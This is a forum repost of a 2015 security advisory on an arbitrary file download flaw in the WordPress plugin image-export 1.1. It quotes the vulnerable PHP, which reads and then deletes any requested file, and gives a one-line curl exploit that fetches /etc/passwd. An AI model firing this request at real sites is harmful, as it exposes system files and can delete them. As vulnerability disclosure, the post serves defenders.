Jump to content
KhiZaRix

WordPress Image Export 1.1 Arbitrary File Download

By KhiZaRix, in Exploituri

Recommended Posts

KhiZaRix Newbie

KhiZaRix

Posted
Posted 


Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.

      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
	• $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

Source: https://dl.packetstormsecurity.net/1507-exploits/wpimageexport-download.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...